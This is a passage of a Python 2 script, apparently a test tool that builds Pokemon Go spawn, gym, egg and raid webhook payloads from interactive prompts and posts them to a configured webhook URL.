lat = payload["message"]["latitude"]
lng = payload["message"]["longitude"]
if not regex_coordinates.match(coordinates):
print "Coordinates not valid. Defaulting to " \
+ str(lat) + ',' + str(lng)
else:
lat, lng = map(float, coordinates.split(","))
payload["message"]["latitude"] = lat
payload["message"]["longitude"] = lng
if type == whtypes["1"]:
print "Enter Pokemon ID\n>",
int_or_default("pokemon_id")
print "Gender (1-3)\n>",
int_or_default("gender")
if payload["message"]["pokemon_id"] == 201:
print "Which form of Unown would you like? (default: A)\n>",
form_character = raw_input()[0:1].upper()
if form_character == '':
print "Defaulting to A"
payload["message"]["form"] = 1
else:
form = ord(form_character)
# A-Z = 1-26, ! = 27, ? = 28
if ord('A') <= form <= ord('Z'):
form -= ord('A') - 1
elif form == 33:
# !
form = 27
elif form == 63:
# ?
form = 28
else:
print "Invalid form type. Defaulting to A"
form = 1
payload["message"]["form"] = form
print "Encounters enabled?\n>",
if raw_input() in truthy:
print "CP?\n>",
int_or_default("cp")
print "Attack IV\n>",
int_or_default("individual_attack")
print "Defense IV\n>",
int_or_default("individual_defense")
print "Stamina IV\n>",
int_or_default("individual_stamina")
print "Id of move 1\n>",
int_or_default("move_1")
print "Id of move 2\n>",
int_or_default("move_2")
if payload["message"]["pokemon_id"] == 19:
print "Count towards tiny Rattata medal?"
if raw_input() in truthy:
payload["message"]["weight"] = 2.0
if payload["message"]["pokemon_id"] == 129:
print "Count towards big Magikarp medal?"
if raw_input() in truthy:
payload["message"]["weight"] = 14.0
elif type == whtypes["3"]:
gym_cache()
print "Which team?(put in a number)\n" + teams_formatted + "\n>",
get_and_validate_team()
elif type == whtypes["4"]:
gym_cache()
print "What level of gym egg? (1-5)\n>",
egglevel = check_int(raw_input(), payload["message"]["level"])
if 6 > egglevel > 0:
payload["message"]["level"] = egglevel
else:
print "Egg level invalid. Assuming level 5"
elif type == whtypes["5"]:
gym_cache()
print "Enter pokemon id for raid\n>",
int_or_default("pokemon_id")
print "Moveset important?\n>",
if raw_input() in truthy:
print "Id of move 1\n>",
int_or_default("move_1")
print "Id of move 2\n>",
int_or_default("move_2")
reset_timers_and_encounters()
while True:
    for i in range(3):
        resp = requests.post(url, json=payload, timeout=5)
        if resp.ok is True:
            print "Notification successful. Returned code {}".format(
                resp.status_code)
            break
        else:
            print "Discord response was {}".format(resp.content)
            raise requests.exceptions.RequestException(
                "Response received {}, webhook not accepted.".format(
                    resp.status_code))
        print "Attempting connection again"
    print "Send again?\n>",
    if raw_input() not in truthy:
        break
    if payload["type"] == "gym":
        print "Which team? (put in number)" + teams_formatted + "\n>",
        get_and_validate_team()
    reset_timers_and_encounters()
| agpl-3.0 | -2,479,586,920,499,399,000 | 30.685422 | 79 | 0.514327 | false |